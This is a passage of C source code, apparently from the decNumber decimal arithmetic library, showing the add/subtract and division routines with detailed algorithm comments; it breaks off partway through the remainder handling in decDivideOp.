.. */ if (e<0) { *(c-1)='-'; /* oops, need - */ u=-e; /* uInt, please */ } /* lay out the exponent [_itoa or equivalent is not ANSI C] */ for (cut=9; cut>=0; cut--) { TODIGIT(u, cut, c, pow); if (*c=='0' && !had) continue; /* skip leading zeros */ had=1; /* had non-0 */ c++; /* step for next */ } /* cut */ } *c='\0'; /* terminate the string (all paths) */ return; } /* decToString */ /* ------------------------------------------------------------------ */ /* decAddOp -- add/subtract operation */ /* */ /* This computes C = A + B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X+X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* negate is DECNEG if rhs should be negated, or 0 otherwise */ /* status accumulates status for the caller */ /* */ /* C must have space for set->digits digits. */ /* Inexact in status must be 0 for correct Exact zero sign in result */ /* ------------------------------------------------------------------ */ /* If possible, the coefficient is calculated directly into C. */ /* However, if: */ /* -- a digits+1 calculation is needed because the numbers are */ /* unaligned and span more than set->digits digits */ /* -- a carry to digits+1 digits looks possible */ /* -- C is the same as A or B, and the result would destructively */ /* overlap the A or B coefficient */ /* then the result must be calculated into a temporary buffer. In */ /* this case a local (stack) buffer is used if possible, and only if */ /* too long for that does malloc become the final resort. */ /* */ /* Misalignment is handled as follows: */ /* Apad: (AExp>BExp) Swap operands and proceed as for BExp>AExp. */ /* BPad: Apply the padding by a combination of shifting (whole */ /* units) and multiplication (part units). */ /* */ /* Addition, especially x=x+1, is speed-critical. */ /* The static buffer is larger than might be expected to allow for */ /* calls from higher-level functions (notably exp). */ /* ------------------------------------------------------------------ */ static decNumber * decAddOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, uByte negate, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif Int rhsshift; /* working shift (in Units) */ Int maxdigits; /* longest logical length */ Int mult; /* multiplier */ Int residue; /* rounding accumulator */ uByte bits; /* result bits */ Flag diffsign; /* non-0 if arguments have different sign */ Unit *acc; /* accumulator for result */ Unit accbuff[SD2U(DECBUFFER*2+20)]; /* local buffer [*2+20 reduces many */ /* allocations when called from */ /* other operations, notable exp] */ Unit *allocacc=NULL; /* -> allocated acc buffer, iff allocated */ Int reqdigits=set->digits; /* local copy; requested DIGITS */ Int padding; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* note whether signs differ [used all paths] */ diffsign=(Flag)((lhs->bits^rhs->bits^negate)&DECNEG); /* handle infinities and NaNs */ if (SPECIALARGS) { /* a special bit set */ if (SPECIALARGS & (DECSNAN | DECNAN)) /* a NaN */ decNaNs(res, lhs, rhs, set, status); else { /* one or two infinities */ if (decNumberIsInfinite(lhs)) { /* LHS is infinity */ /* two infinities with different signs is invalid */ if (decNumberIsInfinite(rhs) && diffsign) { *status|=DEC_Invalid_operation; break; } bits=lhs->bits & DECNEG; /* get sign from LHS */ } else bits=(rhs->bits^negate) & DECNEG;/* RHS must be Infinity */ bits|=DECINF; decNumberZero(res); res->bits=bits; /* set +/- infinity */ } /* an infinity */ break; } /* Quick exit for add 0s; return the non-0, modified as need be */ if (ISZERO(lhs)) { Int adjust; /* work */ Int lexp=lhs->exponent; /* save in case LHS==RES */ bits=lhs->bits; /* .. */ residue=0; /* clear accumulator */ decCopyFit(res, rhs, set, &residue, status); /* copy (as needed) */ res->bits^=negate; /* flip if rhs was negated */ #if DECSUBSET if (set->extended) { /* exponents on zeros count */ #endif /* exponent will be the lower of the two */ adjust=lexp-res->exponent; /* adjustment needed [if -ve] */ if (ISZERO(res)) { /* both 0: special IEEE 854 rules */ if (adjust<0) res->exponent=lexp; /* set exponent */ /* 0-0 gives +0 unless rounding to -infinity, and -0-0 gives -0 */ if (diffsign) { if (set->round!=DEC_ROUND_FLOOR) res->bits=0; else res->bits=DECNEG; /* preserve 0 sign */ } } else { /* non-0 res */ if (adjust<0) { /* 0-padding needed */ if ((res->digits-adjust)>set->digits) { adjust=res->digits-set->digits; /* to fit exactly */ *status|=DEC_Rounded; /* [but exact] */ } res->digits=decShiftToMost(res->lsu, res->digits, -adjust); res->exponent+=adjust; /* set the exponent. */ } } /* non-0 res */ #if DECSUBSET } /* extended */ #endif decFinish(res, set, &residue, status); /* clean and finalize */ break;} if (ISZERO(rhs)) { /* [lhs is non-zero] */ Int adjust; /* work */ Int rexp=rhs->exponent; /* save in case RHS==RES */ bits=rhs->bits; /* be clean */ residue=0; /* clear accumulator */ decCopyFit(res, lhs, set, &residue, status); /* copy (as needed) */ #if DECSUBSET if (set->extended) { /* exponents on zeros count */ #endif /* exponent will be the lower of the two */ /* [0-0 case handled above] */ adjust=rexp-res->exponent; /* adjustment needed [if -ve] */ if (adjust<0) { /* 0-padding needed */ if ((res->digits-adjust)>set->digits) { adjust=res->digits-set->digits; /* to fit exactly */ *status|=DEC_Rounded; /* [but exact] */ } res->digits=decShiftToMost(res->lsu, res->digits, -adjust); res->exponent+=adjust; /* set the exponent. */ } #if DECSUBSET } /* extended */ #endif decFinish(res, set, &residue, status); /* clean and finalize */ break;} /* [NB: both fastpath and mainpath code below assume these cases */ /* (notably 0-0) have already been handled] */ /* calculate the padding needed to align the operands */ padding=rhs->exponent-lhs->exponent; /* Fastpath cases where the numbers are aligned and normal, the RHS */ /* is all in one unit, no operand rounding is needed, and no carry, */ /* lengthening, or borrow is needed */ if (padding==0 && rhs->digits<=DECDPUN && rhs->exponent>=set->emin /* [some normals drop through] */ && rhs->exponent<=set->emax-set->digits+1 /* [could clamp] */ && rhs->digits<=reqdigits && lhs->digits<=reqdigits) { Int partial=*lhs->lsu; if (!diffsign) { /* adding */ partial+=*rhs->lsu; if ((partial<=DECDPUNMAX) /* result fits in unit */ && (lhs->digits>=DECDPUN || /* .. and no digits-count change */ partial<(Int)powers[lhs->digits])) { /* .. */ if (res!=lhs) decNumberCopy(res, lhs); /* not in place */ *res->lsu=(Unit)partial; /* [copy could have overwritten RHS] */ break; } /* else drop out for careful add */ } else { /* signs differ */ partial-=*rhs->lsu; if (partial>0) { /* no borrow needed, and non-0 result */ if (res!=lhs) decNumberCopy(res, lhs); /* not in place */ *res->lsu=(Unit)partial; /* this could have reduced digits [but result>0] */ res->digits=decGetDigits(res->lsu, D2U(res->digits)); break; } /* else drop out for careful subtract */ } } /* Now align (pad) the lhs or rhs so they can be added or */ /* subtracted, as necessary. If one number is much larger than */ /* the other (that is, if in plain form there is a least one */ /* digit between the lowest digit of one and the highest of the */ /* other) padding with up to DIGITS-1 trailing zeros may be */ /* needed; then apply rounding (as exotic rounding modes may be */ /* affected by the residue). */ rhsshift=0; /* rhs shift to left (padding) in Units */ bits=lhs->bits; /* assume sign is that of LHS */ mult=1; /* likely multiplier */ /* [if padding==0 the operands are aligned; no padding is needed] */ if (padding!=0) { /* some padding needed; always pad the RHS, as any required */ /* padding can then be effected by a simple combination of */ /* shifts and a multiply */ Flag swapped=0; if (padding<0) { /* LHS needs the padding */ const decNumber *t; padding=-padding; /* will be +ve */ bits=(uByte)(rhs->bits^negate); /* assumed sign is now that of RHS */ t=lhs; lhs=rhs; rhs=t; swapped=1; } /* If, after pad, rhs would be longer than lhs by digits+1 or */ /* more then lhs cannot affect the answer, except as a residue, */ /* so only need to pad up to a length of DIGITS+1. */ if (rhs->digits+padding > lhs->digits+reqdigits+1) { /* The RHS is sufficient */ /* for residue use the relative sign indication... */ Int shift=reqdigits-rhs->digits; /* left shift needed */ residue=1; /* residue for rounding */ if (diffsign) residue=-residue; /* signs differ */ /* copy, shortening if necessary */ decCopyFit(res, rhs, set, &residue, status); /* if it was already shorter, then need to pad with zeros */ if (shift>0) { res->digits=decShiftToMost(res->lsu, res->digits, shift); res->exponent-=shift; /* adjust the exponent. */ } /* flip the result sign if unswapped and rhs was negated */ if (!swapped) res->bits^=negate; decFinish(res, set, &residue, status); /* done */ break;} /* LHS digits may affect result */ rhsshift=D2U(padding+1)-1; /* this much by Unit shift .. */ mult=powers[padding-(rhsshift*DECDPUN)]; /* .. this by multiplication */ } /* padding needed */ if (diffsign) mult=-mult; /* signs differ */ /* determine the longer operand */ maxdigits=rhs->digits+padding; /* virtual length of RHS */ if (lhs->digits>maxdigits) maxdigits=lhs->digits; /* Decide on the result buffer to use; if possible place directly */ /* into result. */ acc=res->lsu; /* assume add direct to result */ /* If destructive overlap, or the number is too long, or a carry or */ /* borrow to DIGITS+1 might be possible, a buffer must be used. */ /* [Might be worth more sophisticated tests when maxdigits==reqdigits] */ if ((maxdigits>=reqdigits) /* is, or could be, too large */ || (res==rhs && rhsshift>0)) { /* destructive overlap */ /* buffer needed, choose it; units for maxdigits digits will be */ /* needed, +1 Unit for carry or borrow */ Int need=D2U(maxdigits)+1; acc=accbuff; /* assume use local buffer */ if (need*sizeof(Unit)>sizeof(accbuff)) { /* printf("malloc add %ld %ld\n", need, sizeof(accbuff)); */ allocacc=(Unit *)malloc(need*sizeof(Unit)); if (allocacc==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} acc=allocacc; } } res->bits=(uByte)(bits&DECNEG); /* it's now safe to overwrite.. */ res->exponent=lhs->exponent; /* .. operands (even if aliased) */ #if DECTRACE decDumpAr('A', lhs->lsu, D2U(lhs->digits)); decDumpAr('B', rhs->lsu, D2U(rhs->digits)); printf(" :h: %ld %ld\n", rhsshift, mult); #endif /* add [A+B*m] or subtract [A+B*(-m)] */ res->digits=decUnitAddSub(lhs->lsu, D2U(lhs->digits), rhs->lsu, D2U(rhs->digits), rhsshift, acc, mult) *DECDPUN; /* [units -> digits] */ if (res->digits<0) { /* borrowed... */ res->digits=-res->digits; res->bits^=DECNEG; /* flip the sign */ } #if DECTRACE decDumpAr('+', acc, D2U(res->digits)); #endif /* If a buffer was used the result must be copied back, possibly */ /* shortening. (If no buffer was used then the result must have */ /* fit, so can't need rounding and residue must be 0.) */ residue=0; /* clear accumulator */ if (acc!=res->lsu) { #if DECSUBSET if (set->extended) { /* round from first significant digit */ #endif /* remove leading zeros that were added due to rounding up to */ /* integral Units -- before the test for rounding. */ if (res->digits>reqdigits) res->digits=decGetDigits(acc, D2U(res->digits)); decSetCoeff(res, set, acc, res->digits, &residue, status); #if DECSUBSET } else { /* subset arithmetic rounds from original significant digit */ /* May have an underestimate. This only occurs when both */ /* numbers fit in DECDPUN digits and are padding with a */ /* negative multiple (-10, -100...) and the top digit(s) become */ /* 0. (This only matters when using X3.274 rules where the */ /* leading zero could be included in the rounding.) */ if (res->digits<maxdigits) { *(acc+D2U(res->digits))=0; /* ensure leading 0 is there */ res->digits=maxdigits; } else { /* remove leading zeros that added due to rounding up to */ /* integral Units (but only those in excess of the original */ /* maxdigits length, unless extended) before test for rounding. */ if (res->digits>reqdigits) { res->digits=decGetDigits(acc, D2U(res->digits)); if (res->digits<maxdigits) res->digits=maxdigits; } } decSetCoeff(res, set, acc, res->digits, &residue, status); /* Now apply rounding if needed before removing leading zeros. */ /* This is safe because subnormals are not a possibility */ if (residue!=0) { decApplyRound(res, set, residue, status); residue=0; /* did what needed to be done */ } } /* subset */ #endif } /* used buffer */ /* strip leading zeros [these were left on in case of subset subtract] */ res->digits=decGetDigits(res->lsu, D2U(res->digits)); /* apply checks and rounding */ decFinish(res, set, &residue, status); /* "When the sum of two operands with opposite signs is exactly */ /* zero, the sign of that sum shall be '+' in all rounding modes */ /* except round toward -Infinity, in which mode that sign shall be */ /* '-'." [Subset zeros also never have '-', set by decFinish.] */ if (ISZERO(res) && diffsign #if DECSUBSET && set->extended #endif && (*status&DEC_Inexact)==0) { if (set->round==DEC_ROUND_FLOOR) res->bits|=DECNEG; /* sign - */ else res->bits&=~DECNEG; /* sign + */ } } while(0); /* end protected */ if (allocacc!=NULL) free(allocacc); /* drop any storage used */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* .. */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decAddOp */ /* ------------------------------------------------------------------ */ /* decDivideOp -- division operation */ /* */ /* This routine performs the calculations for all four division */ /* operators (divide, divideInteger, remainder, remainderNear). */ /* */ /* C=A op B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X/X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* op is DIVIDE, DIVIDEINT, REMAINDER, or REMNEAR respectively. */ /* status is the usual accumulator */ /* */ /* C must have space for set->digits digits. */ /* */ /* ------------------------------------------------------------------ */ /* The underlying algorithm of this routine is the same as in the */ /* 1981 S/370 implementation, that is, non-restoring long division */ /* with bi-unit (rather than bi-digit) estimation for each unit */ /* multiplier. In this pseudocode overview, complications for the */ /* Remainder operators and division residues for exact rounding are */ /* omitted for clarity. */ /* */ /* Prepare operands and handle special values */ /* Test for x/0 and then 0/x */ /* Exp =Exp1 - Exp2 */ /* Exp =Exp +len(var1) -len(var2) */ /* Sign=Sign1 * Sign2 */ /* Pad accumulator (Var1) to double-length with 0's (pad1) */ /* Pad Var2 to same length as Var1 */ /* msu2pair/plus=1st 2 or 1 units of var2, +1 to allow for round */ /* have=0 */ /* Do until (have=digits+1 OR residue=0) */ /* if exp<0 then if integer divide/residue then leave */ /* this_unit=0 */ /* Do forever */ /* compare numbers */ /* if <0 then leave inner_loop */ /* if =0 then (* quick exit without subtract *) do */ /* this_unit=this_unit+1; output this_unit */ /* leave outer_loop; end */ /* Compare lengths of numbers (mantissae): */ /* If same then tops2=msu2pair -- {units 1&2 of var2} */ /* else tops2=msu2plus -- {0, unit 1 of var2} */ /* tops1=first_unit_of_Var1*10**DECDPUN +second_unit_of_var1 */ /* mult=tops1/tops2 -- Good and safe guess at divisor */ /* if mult=0 then mult=1 */ /* this_unit=this_unit+mult */ /* subtract */ /* end inner_loop */ /* if have\=0 | this_unit\=0 then do */ /* output this_unit */ /* have=have+1; end */ /* var2=var2/10 */ /* exp=exp-1 */ /* end outer_loop */ /* exp=exp+1 -- set the proper exponent */ /* if have=0 then generate answer=0 */ /* Return (Result is defined by Var1) */ /* */ /* ------------------------------------------------------------------ */ /* Two working buffers are needed during the division; one (digits+ */ /* 1) to accumulate the result, and the other (up to 2*digits+1) for */ /* long subtractions. These are acc and var1 respectively. */ /* var1 is a copy of the lhs coefficient, var2 is the rhs coefficient.*/ /* The static buffers may be larger than might be expected to allow */ /* for calls from higher-level functions (notably exp). */ /* ------------------------------------------------------------------ */ static decNumber * decDivideOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, Flag op, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif Unit accbuff[SD2U(DECBUFFER+DECDPUN+10)]; /* local buffer */ Unit *acc=accbuff; /* -> accumulator array for result */ Unit *allocacc=NULL; /* -> allocated buffer, iff allocated */ Unit *accnext; /* -> where next digit will go */ Int acclength; /* length of acc needed [Units] */ Int accunits; /* count of units accumulated */ Int accdigits; /* count of digits accumulated */ Unit varbuff[SD2U(DECBUFFER*2+DECDPUN)*sizeof(Unit)]; /* buffer for var1 */ Unit *var1=varbuff; /* -> var1 array for long subtraction */ Unit *varalloc=NULL; /* -> allocated buffer, iff used */ Unit *msu1; /* -> msu of var1 */ const Unit *var2; /* -> var2 array */ const Unit *msu2; /* -> msu of var2 */ Int msu2plus; /* msu2 plus one [does not vary] */ eInt msu2pair; /* msu2 pair plus one [does not vary] */ Int var1units, var2units; /* actual lengths */ Int var2ulen; /* logical length (units) */ Int var1initpad=0; /* var1 initial padding (digits) */ Int maxdigits; /* longest LHS or required acc length */ Int mult; /* multiplier for subtraction */ Unit thisunit; /* current unit being accumulated */ Int residue; /* for rounding */ Int reqdigits=set->digits; /* requested DIGITS */ Int exponent; /* working exponent */ Int maxexponent=0; /* DIVIDE maximum exponent if unrounded */ uByte bits; /* working sign */ Unit *target; /* work */ const Unit *source; /* .. */ uLong const *pow; /* .. */ Int shift, cut; /* .. */ #if DECSUBSET Int dropped; /* work */ #endif #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ bits=(lhs->bits^rhs->bits)&DECNEG; /* assumed sign for divisions */ /* handle infinities and NaNs */ if (SPECIALARGS) { /* a special bit set */ if (SPECIALARGS & (DECSNAN | DECNAN)) { /* one or two NaNs */ decNaNs(res, lhs, rhs, set, status); break; } /* one or two infinities */ if (decNumberIsInfinite(lhs)) { /* LHS (dividend) is infinite */ if (decNumberIsInfinite(rhs) || /* two infinities are invalid .. */ op & (REMAINDER | REMNEAR)) { /* as is remainder of infinity */ *status|=DEC_Invalid_operation; break; } /* [Note that infinity/0 raises no exceptions] */ decNumberZero(res); res->bits=bits|DECINF; /* set +/- infinity */ break; } else { /* RHS (divisor) is infinite */ residue=0; if (op&(REMAINDER|REMNEAR)) { /* result is [finished clone of] lhs */ decCopyFit(res, lhs, set, &residue, status); } else { /* a division */ decNumberZero(res); res->bits=bits; /* set +/- zero */ /* for DIVIDEINT the exponent is always 0. For DIVIDE, result */ /* is a 0 with infinitely negative exponent, clamped to minimum */ if (op&DIVIDE) { res->exponent=set->emin-set->digits+1; *status|=DEC_Clamped; } } decFinish(res, set, &residue, status); break; } } /* handle 0 rhs (x/0) */ if (ISZERO(rhs)) { /* x/0 is always exceptional */ if (ISZERO(lhs)) { decNumberZero(res); /* [after lhs test] */ *status|=DEC_Division_undefined;/* 0/0 will become NaN */ } else { decNumberZero(res); if (op&(REMAINDER|REMNEAR)) *status|=DEC_Invalid_operation; else { *status|=DEC_Division_by_zero; /* x/0 */ res->bits=bits|DECINF; /* .. is +/- Infinity */ } } break;} /* handle 0 lhs (0/x) */ if (ISZERO(lhs)) { /* 0/x [x!=0] */ #if DECSUBSET if (!set->extended) decNumberZero(res); else { #endif if (op&DIVIDE) { residue=0; exponent=lhs->exponent-rhs->exponent; /* ideal exponent */ decNumberCopy(res, lhs); /* [zeros always fit] */ res->bits=bits; /* sign as computed */ res->exponent=exponent; /* exponent, too */ decFinalize(res, set, &residue, status); /* check exponent */ } else if (op&DIVIDEINT) { decNumberZero(res); /* integer 0 */ res->bits=bits; /* sign as computed */ } else { /* a remainder */ exponent=rhs->exponent; /* [save in case overwrite] */ decNumberCopy(res, lhs); /* [zeros always fit] */ if (exponent<res->exponent) res->exponent=exponent; /* use lower */ } #if DECSUBSET } #endif break;} /* Precalculate exponent. This starts off adjusted (and hence fits */ /* in 31 bits) and becomes the usual unadjusted exponent as the */ /* division proceeds. The order of evaluation is important, here, */ /* to avoid wrap. */ exponent=(lhs->exponent+lhs->digits)-(rhs->exponent+rhs->digits); /* If the working exponent is -ve, then some quick exits are */ /* possible because the quotient is known to be <1 */ /* [for REMNEAR, it needs to be < -1, as -0.5 could need work] */ if (exponent<0 && !(op==DIVIDE)) { if (op&DIVIDEINT) { decNumberZero(res); /* integer part is 0 */ #if DECSUBSET if (set->extended) #endif res->bits=bits; /* set +/- zero */ break;} /* fastpath remainders so long as the lhs has the smaller */ /* (or equal) exponent */ if (lhs->exponent<=rhs->exponent) { if (op&REMAINDER || exponent<-1) { /* It is REMAINDER or safe REMNEAR; result is [finished */ /* clone of] lhs (r = x - 0*y) */ residue=0; decCopyFit(res, lhs, set, &residue, status); decFinish(res, set, &residue, status); break; } /* [unsafe REMNEAR drops through] */ } } /* fastpaths */ /* Long (slow) division is needed; roll up the sleeves... */ /* The accumulator will hold the quotient of the division. */ /* If it needs to be too long for stack storage, then allocate. */ acclength=D2U(reqdigits+DECDPUN); /* in Units */ if (acclength*sizeof(Unit)>sizeof(accbuff)) { /* printf("malloc dvacc %ld units\n", acclength); */ allocacc=(Unit *)malloc(acclength*sizeof(Unit)); if (allocacc==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} acc=allocacc; /* use the allocated space */ } /* var1 is the padded LHS ready for subtractions. */ /* If it needs to be too long for stack storage, then allocate. */ /* The maximum units needed for var1 (long subtraction) is: */ /* Enough for */ /* (rhs->digits+reqdigits-1) -- to allow full slide to right */ /* or (lhs->digits) -- to allow for long lhs */ /* whichever is larger */ /* +1 -- for rounding of slide to right */ /* +1 -- for leading 0s */ /* +1 -- for pre-adjust if a remainder or DIVIDEINT */ /* [Note: unused units do not participate in decUnitAddSub data] */ maxdigits=rhs->digits+reqdigits-1; if (lhs->digits>maxdigits) maxdigits=lhs->digits; var1units=D2U(maxdigits)+2; /* allocate a guard unit above msu1 for REMAINDERNEAR */ if (!(op&DIVIDE)) var1units++; if ((var1units+1)*sizeof(Unit)>sizeof(varbuff)) { /* printf("malloc dvvar %ld units\n", var1units+1); */ varalloc=(Unit *)malloc((var1units+1)*sizeof(Unit)); if (varalloc==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} var1=varalloc; /* use the allocated space */ } /* Extend the lhs and rhs to full long subtraction length. The lhs */ /* is truly extended into the var1 buffer, with 0 padding, so a */ /* subtract in place is always possible. The rhs (var2) has */ /* virtual padding (implemented by decUnitAddSub). */ /* One guard unit was allocated above msu1 for rem=rem+rem in */ /* REMAINDERNEAR. */ msu1=var1+var1units-1; /* msu of var1 */ source=lhs->lsu+D2U(lhs->digits)-1; /* msu of input array */ for (target=msu1; source>=lhs->lsu; source--, target--) *target=*source; for (; target>=var1; target--) *target=0; /* rhs (var2) is left-aligned with var1 at the start */ var2ulen=var1units; /* rhs logical length (units) */ var2units=D2U(rhs->digits); /* rhs actual length (units) */ var2=rhs->lsu; /* -> rhs array */ msu2=var2+var2units-1; /* -> msu of var2 [never changes] */ /* now set up the variables which will be used for estimating the */ /* multiplication factor. If these variables are not exact, add */ /* 1 to make sure that the multiplier is never overestimated. */ msu2plus=*msu2; /* it's value .. */ if (var2units>1) msu2plus++; /* .. +1 if any more */ msu2pair=(eInt)*msu2*(DECDPUNMAX+1);/* top two pair .. */ if (var2units>1) { /* .. [else treat 2nd as 0] */ msu2pair+=*(msu2-1); /* .. */ if (var2units>2) msu2pair++; /* .. +1 if any more */ } /* The calculation is working in units, which may have leading zeros, */ /* but the exponent was calculated on the assumption that they are */ /* both left-aligned. Adjust the exponent to compensate: add the */ /* number of leading zeros in var1 msu and subtract those in var2 msu. */ /* [This is actually done by counting the digits and negating, as */ /* lead1=DECDPUN-digits1, and similarly for lead2.] */ for (pow=&powers[1]; *msu1>=*pow; pow++) exponent--; for (pow=&powers[1]; *msu2>=*pow; pow++) exponent++; /* Now, if doing an integer divide or remainder, ensure that */ /* the result will be Unit-aligned. To do this, shift the var1 */ /* accumulator towards least if need be. (It's much easier to */ /* do this now than to reassemble the residue afterwards, if */ /* doing a remainder.) Also ensure the exponent is not negative. */ if (!(op&DIVIDE)) { Unit *u; /* work */ /* save the initial 'false' padding of var1, in digits */ var1initpad=(var1units-D2U(lhs->digits))*DECDPUN; /* Determine the shift to do. */ if (exponent<0) cut=-exponent; else cut=DECDPUN-exponent%DECDPUN; decShiftToLeast(var1, var1units, cut); exponent+=cut; /* maintain numerical value */ var1initpad-=cut; /* .. and reduce padding */ /* clean any most-significant units which were just emptied */ for (u=msu1; cut>=DECDPUN; cut-=DECDPUN, u--) *u=0; } /* align */ else { /* is DIVIDE */ maxexponent=lhs->exponent-rhs->exponent; /* save */ /* optimization: if the first iteration will just produce 0, */ /* preadjust to skip it [valid for DIVIDE only] */ if (*msu1<*msu2) { var2ulen--; /* shift down */ exponent-=DECDPUN; /* update the exponent */ } } /* ---- start the long-division loops ------------------------------ */ accunits=0; /* no units accumulated yet */ accdigits=0; /* .. or digits */ accnext=acc+acclength-1; /* -> msu of acc [NB: allows digits+1] */ for (;;) { /* outer forever loop */ thisunit=0; /* current unit assumed 0 */ /* find the next unit */ for (;;) { /* inner forever loop */ /* strip leading zero units [from either pre-adjust or from */ /* subtract last time around]. Leave at least one unit. */ for (; *msu1==0 && msu1>var1; msu1--) var1units--; if (var1units<var2ulen) break; /* var1 too low for subtract */ if (var1units==var2ulen) { /* unit-by-unit compare needed */ /* compare the two numbers, from msu */ const Unit *pv1, *pv2; Unit v2; /* units to compare */ pv2=msu2; /* -> msu */ for (pv1=msu1; ; pv1--, pv2--) { /* v1=*pv1 -- always OK */ v2=0; /* assume in padding */ if (pv2>=var2) v2=*pv2; /* in range */ if (*pv1!=v2) break; /* no longer the same */ if (pv1==var1) break; /* done; leave pv1 as is */ } /* here when all inspected or a difference seen */ if (*pv1<v2) break; /* var1 too low to subtract */ if (*pv1==v2) { /* var1 == var2 */ /* reach here if var1 and var2 are identical; subtraction */ /* would increase digit by one, and the residue will be 0 so */ /* the calculation is done; leave the loop with residue=0. */ thisunit++; /* as though subtracted */ *var1=0; /* set var1 to 0 */ var1units=1; /* .. */ break; /* from inner */ } /* var1 == var2 */ /* *pv1>v2. Prepare for real subtraction; the lengths are equal */ /* Estimate the multiplier (there's always a msu1-1)... */ /* Bring in two units of var2 to provide a good estimate. */ mult=(Int)(((eInt)*msu1*(DECDPUNMAX+1)+*(msu1-1))/msu2pair); } /* lengths the same */ else { /* var1units > var2ulen, so subtraction is safe */ /* The var2 msu is one unit towards the lsu of the var1 msu, */ /* so only one unit for var2 can be used. */ mult=(Int)(((eInt)*msu1*(DECDPUNMAX+1)+*(msu1-1))/msu2plus); } if (mult==0) mult=1; /* must always be at least 1 */ /* subtraction needed; var1 is > var2 */ thisunit=(Unit)(thisunit+mult); /* accumulate */ /* subtract var1-var2, into var1; only the overlap needs */ /* processing, as this is an in-place calculation */ shift=var2ulen-var2units; #if DECTRACE decDumpAr('1', &var1[shift], var1units-shift); decDumpAr('2', var2, var2units); printf("m=%ld\n", -mult); #endif decUnitAddSub(&var1[shift], var1units-shift, var2, var2units, 0, &var1[shift], -mult); #if DECTRACE decDumpAr('#', &var1[shift], var1units-shift); #endif /* var1 now probably has leading zeros; these are removed at the */ /* top of the inner loop. */ } /* inner loop */ /* The next unit has been calculated in full; unless it's a */ /* leading zero, add to acc */ if (accunits!=0 || thisunit!=0) { /* is first or non-zero */ *accnext=thisunit; /* store in accumulator */ /* account exactly for the new digits */ if (accunits==0) { accdigits++; /* at least one */ for (pow=&powers[1]; thisunit>=*pow; pow++) accdigits++; } else accdigits+=DECDPUN; accunits++; /* update count */ accnext--; /* ready for next */ if (accdigits>reqdigits) break; /* have enough digits */ } /* if the residue is zero, the operation is done (unless divide */ /* or divideInteger and still not enough digits yet) */ if (*var1==0 && var1units==1) { /* residue is 0 */ if (op&(REMAINDER|REMNEAR)) break; if ((op&DIVIDE) && (exponent<=maxexponent)) break; /* [drop through if divideInteger] */ } /* also done enough if calculating remainder or integer */ /* divide and just did the last ('units') unit */ if (exponent==0 && !(op&DIVIDE)) break; /* to get here, var1 is less than var2, so divide var2 by the per- */ /* Unit power of ten and go for the next digit */ var2ulen--; /* shift down */ exponent-=DECDPUN; /* update the exponent */ } /* outer loop */ /* ---- division is complete --------------------------------------- */ /* here: acc has at least reqdigits+1 of good results (or fewer */ /* if early stop), starting at accnext+1 (its lsu) */ /* var1 has any residue at the stopping point */ /* accunits is the number of digits collected in acc */ if (accunits==0) { /* acc is 0 */ accunits=1; /* show have a unit .. */ accdigits=1; /* .. */ *accnext=0; /* .. whose value is 0 */ } else accnext++; /* back to last placed */ /* accnext now -> lowest unit of result */ residue=0; /* assume no residue */ if (op&DIVIDE) { /* record the presence of any residue, for rounding */ if (*var1!=0 || var1units>1) residue=1; else { /* no residue */ /* Had an exact division; clean up spurious trailing 0s. */ /* There will be at most DECDPUN-1, from the final multiply, */ /* and then only if the result is non-0 (and even) and the */ /* exponent is 'loose'. */ #if DECDPUN>1 Unit lsu=*accnext; if (!(lsu&0x01) && (lsu!=0)) { /* count the trailing zeros */ Int drop=0; for (;; drop++) { /* [will terminate because lsu!=0] */ if (exponent>=maxexponent) break; /* don't chop real 0s */ #if DECDPUN<=4 if ((lsu-QUOT10(lsu, drop+1) *powers[drop+1])!=0) break; /* found non-0 digit */ #else if (lsu%powers[drop+1]!=0) break; /* found non-0 digit */ #endif exponent++; } if (drop>0) { accunits=decShiftToLeast(accnext, accunits, drop); accdigits=decGetDigits(accnext, accunits); accunits=D2U(accdigits); /* [exponent was adjusted in the loop] */ } } /* neither odd nor 0 */ #endif } /* exact divide */ } /* divide */ else /* op!=DIVIDE */ { /* check for coefficient overflow */ if (accdigits+exponent>reqdigits) { *status|=DEC_Division_impossible; break; } if (op & (REMAINDER|REMNEAR)) { /* [Here, the exponent will be 0, because var1 was adjusted */ /* appropriately.] */ Int postshift; /* work */ Flag wasodd=0; /* integer was odd */ Unit *quotlsu; /* for save */ Int quotdigits; /* .. */ bits=lhs->bits; /* remainder sign is always as lhs */ /* Fastpath when residue is truly 0 is worthwhile [and */ /* simplifies the code below] */ if (*var1==0 && var1units==1) { /* residue is 0 */ Int exp=lhs->exponent; /* save min(exponents) */ if (rhs->exponent<exp) exp=rhs->exponent; decNumberZero(res); /* 0 coefficient */ #if DECSUBSET if (set->extended) #endif res->exponent=exp; /* .. with proper exponent */ res->bits=(uByte)(bits&DECNEG); /* [cleaned] */ 